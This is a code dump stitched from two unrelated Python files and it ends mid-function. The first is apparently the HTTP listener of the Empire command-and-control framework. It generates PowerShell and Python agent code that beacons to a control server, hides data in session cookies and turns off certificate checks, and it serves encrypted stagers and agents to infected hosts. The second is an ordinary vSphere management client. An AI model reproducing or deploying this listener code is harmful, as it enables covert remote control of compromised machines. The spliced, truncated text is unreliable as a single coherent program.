    This is so agents can easily be dynamically updated for the new listener.

    Returns a string of PowerShell or Python source that gets spliced into
    the agent template at the REPLACE_COMMS marker. Returns None (implicitly)
    on a bad/missing language.
    """
    if language:
        if language.lower() == 'powershell':
            # control-server list + index that the agent's comms code rotates through
            updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
            # for HTTPS listeners, disable certificate validation on the agent side
            if listenerOptions['Host']['Value'].startswith('https'):
                updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
            # GET-side comms: routing packet goes out base64'd in the session cookie
            getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
            # POST-side comms: encrypted results wrapped in an RC4 routing packet
            sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
}
}
}
}
"""
            return updateServers + getTask + sendMessage
        elif language.lower() == 'python':
            updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
            # for HTTPS listeners, disable certificate validation on the agent side
            if listenerOptions['Host']['Value'].startswith('https'):
                updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
            # single send_message() handles both GET (tasking) and POST (results)
            sendMessage = """
def send_message(packets=None):
    # Requests a tasking or posts data to a randomized tasking URI.
    # If packets == None, the agent GETs a tasking from the control server.
    # If packets != None, the agent encrypts the passed packets and
    # POSTs the data to the control server.
    global missedCheckins
    global server
    global headers
    global taskURIs
    data = None
    if packets:
        data = ''.join(packets)
        # aes_encrypt_then_hmac is in stager.py
        encData = aes_encrypt_then_hmac(key, data)
        data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
    else:
        # if we're GETing taskings, then build the routing packet to stuff info a cookie first.
        # meta TASKING_REQUEST = 4
        routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
        b64routingPacket = base64.b64encode(routingPacket)
        headers['Cookie'] = "session=%s" % (b64routingPacket)
    taskURI = random.sample(taskURIs, 1)[0]
    requestUri = server + taskURI
    try:
        data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
        return ('200', data)
    except urllib2.HTTPError as HTTPError:
        # if the server is reached, but returns an erro (like 404)
        missedCheckins = missedCheckins + 1
        return (HTTPError.code, '')
    except urllib2.URLError as URLerror:
        # if the server cannot be reached
        missedCheckins = missedCheckins + 1
        return (URLerror.reason, '')
    return ('', '')
"""
            return updateServers + sendMessage
        else:
            print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
    else:
        print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start_server(self, listenerOptions):
    """
    Threaded function that actually starts up the Flask server.

    Registers the GET/POST agent-comms routes plus IP-filtering and
    header-scrubbing hooks, then blocks in app.run() (optionally over
    TLS when a cert path is configured and the host is https).
    """
    # make a copy of the currently set listener options for later stager/agent generation
    listenerOptions = copy.deepcopy(listenerOptions)
    # suppress the normal Flask output
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)
    bindIP = listenerOptions['BindIP']['Value']
    host = listenerOptions['Host']['Value']
    port = listenerOptions['Port']['Value']
    stagingKey = listenerOptions['StagingKey']['Value']
    app = Flask(__name__)
    self.app = app
    @app.before_request
    def check_ip():
        """
        Before every request, check if the IP address is allowed.
        """
        if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
            dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
            # blocked clients still get the benign default response (HTTP 200)
            return make_response(self.default_response(), 200)
    @app.after_request
    def change_header(response):
        "Modify the default server version in the response."
        response.headers['Server'] = listenerOptions['ServerVersion']['Value']
        return response
    @app.after_request
    def add_proxy_headers(response):
        "Add HTTP headers to avoid proxy caching."
        response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
        response.headers['Pragma'] = "no-cache"
        response.headers['Expires'] = "0"
        return response
    @app.route('/<path:request_uri>', methods=['GET'])
    def handle_get(request_uri):
        """
        Handle an agent GET request.
        This is used during the first step of the staging process,
        and when the agent requests taskings.
        """
        clientIP = request.remote_addr
        dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
        routingPacket = None
        cookie = request.headers.get('Cookie')
        if cookie and cookie != '':
            try:
                # see if we can extract the 'routing packet' from the specified cookie location
                # NOTE: this can be easily moved to a paramter, another cookie value, etc.
                if 'session' in cookie:
                    dispatcher.send("[*] GET cookie value from %s : %s" % (clientIP, cookie), sender='listeners/http')
                    cookieParts = cookie.split(';')
                    for part in cookieParts:
                        if part.startswith('session'):
                            base64RoutingPacket = part[part.find('=')+1:]
                            # decode the routing packet base64 value in the cookie
                            routingPacket = base64.b64decode(base64RoutingPacket)
            except Exception as e:
                # any malformed cookie/base64 is treated as "no routing packet"
                routingPacket = None
                pass
        if routingPacket:
            # parse the routing packet and process the results
            dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
            if dataResults and len(dataResults) > 0:
                for (language, results) in dataResults:
                    if results:
                        if results == 'STAGE0':
                            # handle_agent_data() signals that the listener should return the stager.ps1 code
                            # step 2 of negotiation -> return stager.ps1 (stage 1)
                            dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
                            stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
                            return make_response(stage, 200)
                        elif results.startswith('ERROR:'):
                            dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
                            if 'not in cache' in results:
                                # signal the client to restage via a 401
                                print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
                                return make_response(self.default_response(), 401)
                            else:
                                return make_response(self.default_response(), 200)
                        else:
                            # actual taskings
                            dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
                            return make_response(results, 200)
                    else:
                        # dispatcher.send("[!] Results are None...", sender='listeners/http')
                        return make_response(self.default_response(), 200)
            else:
                return make_response(self.default_response(), 200)
        else:
            dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
            return make_response(self.default_response(), 200)
    @app.route('/<path:request_uri>', methods=['POST'])
    def handle_post(request_uri):
        """
        Handle an agent POST request.
        """
        stagingKey = listenerOptions['StagingKey']['Value']
        clientIP = request.remote_addr
        requestData = request.get_data()
        dispatcher.send("[*] POST request data length from %s : %s" % (clientIP, len(requestData)), sender='listeners/http')
        # the routing packet should be at the front of the binary request.data
        # NOTE: this can also go into a cookie/etc.
        dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
        if dataResults and len(dataResults) > 0:
            for (language, results) in dataResults:
                if results:
                    if results.startswith('STAGE2'):
                        # TODO: document the exact results structure returned
                        # bracket-wrap IPv6 client addresses
                        if ':' in clientIP:
                            clientIP = '[' + str(clientIP) + ']'
                        sessionID = results.split(' ')[1].strip()
                        sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
                        dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
                        hopListenerName = request.headers.get('Hop-Name')
                        try:
                            # if this request came through a hop listener, patch its Host in
                            hopListener = helpers.get_listener_options(hopListenerName)
                            tempListenerOptions = copy.deepcopy(listenerOptions)
                            tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
                        except TypeError:
                            tempListenerOptions = listenerOptions
                        # step 6 of negotiation -> server sends patched agent.ps1/agent.py
                        agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
                        encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
                        # TODO: wrap ^ in a routing packet?
                        return make_response(encryptedAgent, 200)
                    elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
                        dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
                        return make_response(self.default_response(), 200)
                    elif results == 'VALID':
                        dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
                        return make_response(self.default_response(), 200)
                    else:
                        return make_response(results, 200)
                else:
                    return make_response(self.default_response(), 200)
        else:
            return make_response(self.default_response(), 200)
    try:
        certPath = listenerOptions['CertPath']['Value']
        host = listenerOptions['Host']['Value']
        if certPath.strip() != '' and host.startswith('https'):
            certPath = os.path.abspath(certPath)
            # NOTE(review): TLSv1-only context; consider a modern default
            context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
            app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
        else:
            app.run(host=bindIP, port=int(port), threaded=True)
    except Exception as e:
        print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
        dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
    """
    Start a threaded instance of self.start_server() and store it in the
    self.threads dictionary keyed by the listener name.

    Returns True if the listener thread is still alive ~1 second after
    starting, False otherwise.
    """
    listenerOptions = self.options
    # fall back to the configured listener name when none was passed;
    # both branches of the original were otherwise identical, so the
    # duplicated start logic is collapsed into one path
    if not name:
        name = listenerOptions['Name']['Value']
    self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
    self.threads[name].start()
    time.sleep(1)
    # returns True if the listener successfully started, false otherwise
    return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
virtualcenter.py | # coding: utf-8
"""Backend management system classes
Used to communicate with providers without using CFME facilities
"""
from __future__ import absolute_import
import atexit
import operator
import re
import ssl
import threading
import time
from datetime import datetime
from distutils.version import LooseVersion
from functools import partial
import pytz
import six
from cached_property import threaded_cached_property
from pyVim.connect import Disconnect, SmartConnect
from pyVmomi import vim, vmodl
from wait_for import TimedOutError, wait_for
from .base import VMInfo, WrapanapiAPIBaseVM
from .exceptions import (HostNotRemoved, VMCreationDateError,
VMInstanceNotCloned, VMInstanceNotFound,
VMInstanceNotSuspended, VMNotFoundViaIP)
# Names of the selection specs used when building a full-inventory traversal.
# The integer values in TRAVERSAL_SPECS' 'select_indices' index into this list
# (see _build_filter_spec), so the ORDER here is significant.
SELECTION_SPECS = [
    'resource_pool_traversal_spec',
    'resource_pool_vm_traversal_spec',
    'folder_traversal_spec',
    'datacenter_host_traversal_spec',
    'datacenter_vm_traversal_spec',
    'compute_resource_rp_traversal_spec',
    'compute_resource_host_traversal_spec',
    'host_vm_traversal_spec',
    'datacenter_datastore_traversal_spec'
]
# Declarative description of the PropertyCollector traversal specs built by
# _build_filter_spec: each entry names a spec, the managed-object type it
# starts from, the property path to follow, and which SELECTION_SPECS entries
# (by index) to apply next.
TRAVERSAL_SPECS = [
    {
        'name': 'resource_pool_traversal_spec',
        'type': vim.ResourcePool,
        'path': 'resourcePool',
        'select_indices': [0, 1]
    },
    {
        'name': 'resource_pool_vm_traversal_spec',
        'type': vim.ResourcePool,
        'path': 'vm',
        'select_indices': []
    },
    {
        'name': 'compute_resource_rp_traversal_spec',
        'type': vim.ComputeResource,
        'path': 'resourcePool',
        'select_indices': [0, 1]
    },
    {
        'name': 'compute_resource_host_traversal_spec',
        'type': vim.ComputeResource,
        'path': 'host',
        'select_indices': []
    },
    {
        'name': 'datacenter_host_traversal_spec',
        'type': vim.Datacenter,
        'path': 'hostFolder',
        'select_indices': [2]
    },
    {
        'name': 'datacenter_datastore_traversal_spec',
        'type': vim.Datacenter,
        'path': 'datastoreFolder',
        'select_indices': [2]
    },
    {
        'name': 'datacenter_vm_traversal_spec',
        'type': vim.Datacenter,
        'path': 'vmFolder',
        'select_indices': [2]
    },
    {
        'name': 'host_vm_traversal_spec',
        'type': vim.HostSystem,
        'path': 'vm',
        'select_indices': [2]
    },
    {
        'name': 'folder_traversal_spec',
        'type': vim.Folder,
        'path': 'childEntity',
        'select_indices': [2, 3, 4, 5, 6, 7, 1, 8]
    }
]
def get_task_error_message(task):
    """Depending on the error type, a different attribute may contain the error message. This
    function will figure out the error message.
    """
    error = task.info.error
    # probe the known message attributes in priority order
    for attr_name in ('message', 'localizedMessage', 'msg'):
        if hasattr(error, attr_name):
            return str(getattr(error, attr_name))
    return 'Unknown error type: {}'.format(error)
class VMWareSystem(WrapanapiAPIBaseVM):
    """Client to Vsphere API
    Args:
        hostname: The hostname of the system.
        username: The username to connect with.
        password: The password to connect with.
    See also:
        vSphere Management SDK API docs
        https://developercenter.vmware.com/web/dp/doc/preview?id=155
    """
    # legacy slot for a raw API handle; not set anywhere visible here
    _api = None
    # stat name -> callable used by the base class's stats machinery
    _stats_available = {
        'num_vm': lambda self: len(self.list_vm()),
        'num_host': lambda self: len(self.list_host()),
        'num_cluster': lambda self: len(self.list_cluster()),
        'num_template': lambda self: len(self.list_template()),
        'num_datastore': lambda self: len(self.list_datastore()),
    }
    # vim.VirtualMachine powerState string constants
    POWERED_ON = 'poweredOn'
    POWERED_OFF = 'poweredOff'
    SUSPENDED = 'suspended'
def __init__(self, hostname, username, password, **kwargs):
    """Record connection credentials; no vCenter connection is made until
    ``service_instance`` is first accessed."""
    super(VMWareSystem, self).__init__(kwargs)
    self.kwargs = kwargs
    self.hostname = hostname
    self.username = username
    self.password = password
    # name -> managed object cache used by _get_vm()
    self._vm_cache = {}
def _start_keepalive(self):
    """
    Send a 'current time' request to vCenter every 10 min as a
    connection keep-alive
    """
    def _poll_forever():
        # CurrentTime() is a cheap round-trip that keeps the session alive
        while True:
            self.logger.debug(
                "vCenter keep-alive: %s", self.service_instance.CurrentTime()
            )
            time.sleep(600)
    keepalive_thread = threading.Thread(target=_poll_forever)
    keepalive_thread.daemon = True
    keepalive_thread.start()
def _create_service_instance(self):
    """
    Create service instance and start a keep-alive thread
    See https://github.com/vmware/pyvmomi/issues/347 for why this is needed.
    """
    try:
        # Disable SSL cert verification
        ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ssl_context.verify_mode = ssl.CERT_NONE
        connection = SmartConnect(
            host=self.hostname,
            user=self.username,
            pwd=self.password,
            sslContext=ssl_context
        )
    except Exception:
        self.logger.error("Failed to connect to vCenter")
        raise
    # Disconnect at teardown
    atexit.register(Disconnect, connection)
    self.logger.info(
        "Connected to vCenter host %s as user %s",
        self.hostname, self.username
    )
    self._start_keepalive()
    return connection
@threaded_cached_property
def service_instance(self):
    """Lazily-created, cached vCenter service instance."""
    self.logger.debug("Attempting to initiate vCenter service instance")
    instance = self._create_service_instance()
    return instance
@threaded_cached_property
def content(self):
    """Cached vSphere ServiceContent root object."""
    self.logger.debug("calling RetrieveContent()... this might take awhile")
    root_content = self.service_instance.RetrieveContent()
    return root_content
@property
def version(self):
    """The product version"""
    about_version = self.content.about.version
    return LooseVersion(about_version)
@property
def default_resource_pool(self):
    """Resource pool name supplied via kwargs, or None if not configured."""
    return self.kwargs.get("default_resource_pool")
def _get_obj_list(self, vimtype, folder=None):
    """Get a list of objects of type ``vimtype``"""
    # default to a recursive search from the inventory root
    search_root = folder or self.content.rootFolder
    container_view = self.content.viewManager.CreateContainerView(search_root, [vimtype], True)
    return container_view.view
def _get_obj(self, vimtype, name, folder=None):
    """Get an object of type ``vimtype`` with name ``name`` from Vsphere"""
    # return the first name match, or None when nothing matches
    matches = (candidate for candidate in self._get_obj_list(vimtype, folder)
               if candidate.name == name)
    return next(matches, None)
def _search_folders_for_vm(self, name):
    """Search every inventory folder for a VM by name; None if not found."""
    # collect all folders once, then release the view
    folder_view = self.content.viewManager.CreateContainerView(
        self.content.rootFolder, [vim.Folder], True)
    all_folders = folder_view.view
    folder_view.Destroy()
    # probe each folder until the searchIndex finds a child with that name
    found_vm = None
    for candidate_folder in all_folders:
        found_vm = self.content.searchIndex.FindChild(candidate_folder, name)
        if found_vm:
            break
    return found_vm
def _build_filter_spec(self, begin_entity, property_spec):
    """Build a search spec for full inventory traversal, adapted from psphere"""
    # selection specs referenced (by index) from the traversal specs below
    selection_specs = [vmodl.query.PropertyCollector.SelectionSpec(name=spec_name)
                       for spec_name in SELECTION_SPECS]
    # build one TraversalSpec per declarative TRAVERSAL_SPECS entry
    traversal_specs = []
    for spec_values in TRAVERSAL_SPECS:
        traversal_spec = vmodl.query.PropertyCollector.TraversalSpec()
        traversal_spec.name = spec_values['name']
        traversal_spec.type = spec_values['type']
        traversal_spec.path = spec_values['path']
        if spec_values.get('select_indices'):
            traversal_spec.selectSet = [selection_specs[index]
                                        for index in spec_values['select_indices']]
        traversal_specs.append(traversal_spec)
    # object spec rooted at the given entity
    object_spec = vmodl.query.PropertyCollector.ObjectSpec()
    object_spec.obj = begin_entity
    object_spec.selectSet = traversal_specs
    # filter spec wrapping the property + object specs
    filter_spec = vmodl.query.PropertyCollector.FilterSpec()
    filter_spec.propSet = [property_spec]
    filter_spec.objectSet = [object_spec]
    return filter_spec
def _get_updated_obj(self, obj):
    """
    Build a filter spec based on ``obj`` and return the updated object.

    Args:
        obj (pyVmomi.ManagedObject): The managed object to update, will be a specific subclass

    Returns:
        The refreshed managed object, or None when the property collector
        reports no update for it.
    """
    # Set up the filter specs
    property_spec = vmodl.query.PropertyCollector.PropertySpec(type=type(obj), all=True)
    object_spec = vmodl.query.PropertyCollector.ObjectSpec(obj=obj)
    filter_spec = vmodl.query.PropertyCollector.FilterSpec()
    filter_spec.propSet = [property_spec]
    filter_spec.objectSet = [object_spec]
    # Get updates based on the filter
    property_collector = self.content.propertyCollector
    filter_ = property_collector.CreateFilter(filter_spec, True)
    # BUG FIX: the filter was previously leaked (never Destroyed) when no
    # update came back; destroy it on every exit path via try/finally
    try:
        update = property_collector.WaitForUpdates(None)
        if not update or not update.filterSet or not update.filterSet[0]:
            self.logger.warning('No object found when updating %s', str(obj))
            return
        return update.filterSet[0].objectSet[0].obj
    finally:
        if filter_:
            filter_.Destroy()
def _get_vm(self, vm_name, force=False):
    """Returns a vm from the VI object.
    Instead of using self._get_obj, this uses more efficient ways of
    searching for the VM since we can often have lots of VM's on the
    provider to sort through.
    Args:
        vm_name (string): The name of the VM
        force (bool): Ignore the cache when updating
    Returns:
        pyVmomi.vim.VirtualMachine: VM object
    Raises:
        VMInstanceNotFound: when no folder contains a VM with that name
    """
    if force or vm_name not in self._vm_cache:
        # cache miss (or forced refresh): do the full folder search
        self.logger.debug("Searching all vm folders for vm '%s'", vm_name)
        located_vm = self._search_folders_for_vm(vm_name)
        if not located_vm:
            raise VMInstanceNotFound(vm_name)
        self._vm_cache[vm_name] = located_vm
    else:
        # cache hit: refresh the cached managed object in place
        self._vm_cache[vm_name] = self._get_updated_obj(self._vm_cache[vm_name])
    return self._vm_cache[vm_name]
def _get_resource_pool(self, resource_pool_name=None):
    """ Returns a resource pool managed object for a specified name.
    Args:
        resource_pool_name (string): The name of the resource pool. If None, first one will be
            picked.
    Returns:
        pyVmomi.vim.ResourcePool: The managed object of the resource pool.
    """
    # explicit argument wins, then the configured default, then "any pool"
    chosen_name = (resource_pool_name if resource_pool_name is not None
                   else self.default_resource_pool)
    if chosen_name is not None:
        return self._get_obj(vim.ResourcePool, chosen_name)
    return self._get_obj_list(vim.ResourcePool)[0]
def _task_wait(self, task):
    """
    Update a task and check its state. If the task state is not ``queued``, ``running`` or
    ``None``, then return the state. Otherwise return None.
    Args:
        task (pyVmomi.vim.Task): The task whose state is being monitored
    Returns:
        string: pyVmomi.vim.TaskInfo.state value if the task is not queued/running/None
    """
    refreshed = self._get_updated_obj(task)
    state = refreshed.info.state
    # still-in-progress states yield None (implicitly) so callers keep polling
    if state not in ('queued', 'running', None):
        return state
def _task_status(self, task):
    """Update a task and return its state, as a vim.TaskInfo.State string wrapper
    Args:
        task (pyVmomi.vim.Task): The task whose state is being returned
    Returns:
        string: pyVmomi.vim.TaskInfo.state value
    """
    refreshed = self._get_updated_obj(task)
    return refreshed.info.state
def does_vm_exist(self, name):
    """ Checks if a vm exists or not.
    Args:
        name: The name of the requested vm.
    Returns: A boolean, ``True`` if the vm exists, ``False`` if not.
    """
    try:
        found = self._get_vm(name)
    except VMInstanceNotFound:
        return False
    return found is not None
def current_ip_address(self, vm_name):
    """Return the VM's guest-reported IPv4 address, or None when the VM has
    no usable address yet (missing, non-IPv4, or loopback)."""
    ipv4_re = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
    try:
        reported_ip = self._get_vm(vm_name).summary.guest.ipAddress
        if reported_ip == '127.0.0.1' or not re.match(ipv4_re, reported_ip):
            return None
        return reported_ip
    except (AttributeError, TypeError):
        # AttributeError: vm doesn't have an ip address yet
        # TypeError: ip address wasn't a string
        return None
def get_ip_address(self, vm_name, timeout=600):
    """ Returns the first IP address for the selected VM.
    Args:
        vm_name: The name of the vm to obtain the IP for.
        timeout: The IP address wait timeout.
    Returns: A string containing the first found IP that isn't the loopback device.
    """
    try:
        # poll every 5s until the guest reports a usable address
        found_ip, _ = wait_for(lambda: self.current_ip_address(vm_name),
                               fail_condition=None, delay=5, num_sec=timeout,
                               message="get_ip_address from vsphere")
    except TimedOutError:
        found_ip = None
    return found_ip
def _get_list_vms(self, get_template=False, inaccessible=False):
    """ Obtains a list of all VMs on the system.
    Optional flag to obtain template names too.
    Args:
        get_template: A boolean describing if it should return template names also.
        inaccessible: Include VMs whose connectionState is "inaccessible".
    Returns: A list of VMs.
    """
    # Use some pyVmomi internals to get vm propsets back directly with requested properties,
    # so we skip the network overhead of returning full managed objects
    property_spec = vmodl.query.PropertyCollector.PropertySpec()
    property_spec.all = False
    property_spec.pathSet = ['name', 'config.template', 'config.uuid',
                             'runtime.connectionState']
    property_spec.type = vim.VirtualMachine
    filter_spec = self._build_filter_spec(self.content.rootFolder, property_spec)
    object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[filter_spec])
    # Ensure get_template is either True or False to match the config.template property
    get_template = bool(get_template)
    # Select the vms or templates based on get_template and the returned properties
    names = []
    for object_content in object_contents:
        # Nested property lookups work, but the attr lookup on the
        # vm object still triggers a request even though the vm
        # object already "knows" the answer in its cached object
        # content. So we just pull the value straight out of the cache.
        vm_props = {prop.name: prop.val for prop in object_content.propSet}
        if vm_props.get('config.template') != get_template:
            continue
        # include inaccessible VMs only when the caller asked for them
        # (logically equivalent to the original compound condition)
        if inaccessible or vm_props.get('runtime.connectionState') != "inaccessible":
            names.append(vm_props['name'])
    return names
def all_vms(self):
    """Return a VMInfo tuple (uuid, name, power state, ip) for every
    non-template VM on the provider."""
    # fetch only name + template flag via the property collector; the rest
    # comes from each object's summary
    property_spec = vmodl.query.PropertyCollector.PropertySpec()
    property_spec.all = False
    property_spec.pathSet = ['name', 'config.template']
    property_spec.type = vim.VirtualMachine
    filter_spec = self._build_filter_spec(self.content.rootFolder, property_spec)
    object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[filter_spec])
    vm_infos = []
    for object_content in object_contents:
        props = {prop.name: prop.val for prop in object_content.propSet}
        # templates are excluded
        if props.get('config.template'):
            continue
        try:
            ip = str(object_content.obj.summary.guest.ipAddress)
        except AttributeError:
            ip = None
        try:
            uuid = str(object_content.obj.summary.config.uuid)
        except AttributeError:
            uuid = None
        vm_infos.append(
            VMInfo(
                uuid,
                str(object_content.obj.summary.config.name),
                str(object_content.obj.summary.runtime.powerState),
                ip,
            )
        )
    return vm_infos
def get_vm_guid(self, vm_name):
    """Return the BIOS UUID string of the named VM, or None if unavailable."""
    vm = self._get_vm(vm_name)
    try:
        uuid_value = vm.summary.config.uuid
    except AttributeError:
        return None
    return str(uuid_value)
def get_vm_name_from_ip(self, ip):
    """ Gets the name of a vm from its IP.

    Args:
        ip: The ip address of the vm.
    Returns: The vm name for the corresponding IP.

    vSphere remembers every IP a VM ever had, so FindAllByIp can return
    several VMs; the one with the most recent boot time wins.
    """
    vms = self.content.searchIndex.FindAllByIp(ip=ip, vmSearch=True)
    boot_times = {}
    for vm in vms:
        if vm.name not in boot_times:
            # Epoch fallback so VMs with no readable bootTime sort last.
            boot_times[vm.name] = datetime.fromtimestamp(0)
        try:
            boot_times[vm.name] = vm.summary.runtime.bootTime
        except Exception:
            pass
    if not boot_times:
        raise VMNotFoundViaIP('The requested IP is not known as a VM')
    newest_name, _ = max(boot_times.items(), key=operator.itemgetter(1))
    return newest_name
def start_vm(self, vm_name):
    """Power on the named VM and wait until it is running. Returns True."""
    self.wait_vm_steady(vm_name)
    if self.is_vm_running(vm_name):
        self.logger.info(" vSphere VM %s is already running" % vm_name)
        return True
    self.logger.info(" Starting vSphere VM %s" % vm_name)
    self._get_vm(vm_name).PowerOnVM_Task()
    self.wait_vm_running(vm_name)
    return True
def stop_vm(self, vm_name):
    """Power off the named VM, resuming it first when suspended.

    Returns True; a logged no-op when the VM is already stopped.
    """
    self.wait_vm_steady(vm_name)
    if self.is_vm_stopped(vm_name):
        self.logger.info(" vSphere VM %s is already stopped" % vm_name)
        return True
    self.logger.info(" Stopping vSphere VM %s" % vm_name)
    vm = self._get_vm(vm_name)
    if self.is_vm_suspended(vm_name):
        # A suspended VM cannot be powered off directly.
        self.logger.info(
            " Resuming suspended VM %s before stopping." % vm_name
        )
        vm.PowerOnVM_Task()
        self.wait_vm_running(vm_name)
    vm.PowerOffVM_Task()
    self.wait_vm_stopped(vm_name)
    return True
def delete_vm(self, vm_name):
    """Stop and destroy the named VM; True on success, False on timeout/failure."""
    self.wait_vm_steady(vm_name)
    self.logger.info(" Deleting vSphere VM %s" % vm_name)
    vm = self._get_vm(vm_name)
    self.stop_vm(vm_name)
    task = vm.Destroy_Task()
    try:
        wait_for(lambda: self._task_status(task) == 'success', delay=3, num_sec=600)
    except TimedOutError:
        return False
    return self._task_status(task) == 'success'
def is_host_connected(self, host_name):
    """True when the named ESXi host reports the 'connected' state."""
    host = self._get_obj(vim.HostSystem, name=host_name)
    state = host.summary.runtime.connectionState
    return state == "connected"
def create_vm(self, vm_name):
    # Creating a VM from scratch is not supported by this wrapper; clone an
    # existing template via deploy_template() instead.
    raise NotImplementedError('This function has not yet been implemented.')
def restart_vm(self, vm_name):
    """Stop then start the VM; short-circuits when the stop fails."""
    self.logger.info(" Restarting vSphere VM %s" % vm_name)
    stopped = self.stop_vm(vm_name)
    return stopped and self.start_vm(vm_name)
def list_vm(self, inaccessible=False):
    # Names of all non-template VMs; include inaccessible ones when requested.
    return self._get_list_vms(inaccessible=inaccessible)
def list_template(self):
    # Names of all VMs that are marked as templates.
    return self._get_list_vms(get_template=True)
def list_flavor(self):
    # vSphere has no flavor concept (that belongs to cloud providers).
    raise NotImplementedError('This function is not supported on this platform.')
def list_host(self):
    """Return the names of all ESXi hosts in the inventory."""
    hosts = self._get_obj_list(vim.HostSystem)
    return [str(host.name) for host in hosts]
def list_host_datastore_url(self, host_name):
    """Return the URLs of every datastore attached to the named host."""
    host = self._get_obj(vim.HostSystem, name=host_name)
    return [str(ds.summary.url) for ds in host.datastore]
def list_datastore(self):
    """Return names of datastores that have at least one host attached."""
    datastores = self._get_obj_list(vim.Datastore)
    return [str(ds.name) for ds in datastores if ds.host]
def list_cluster(self):
    """Return the names of all compute clusters."""
    clusters = self._get_obj_list(vim.ClusterComputeResource)
    return [str(cluster.name) for cluster in clusters]
def list_resource_pools(self):
    """Return the names of all resource pools."""
    pools = self._get_obj_list(vim.ResourcePool)
    return [str(pool.name) for pool in pools]
def info(self):
    """Return the endpoint's API type and version (e.g. 'VirtualCenter 6.5')."""
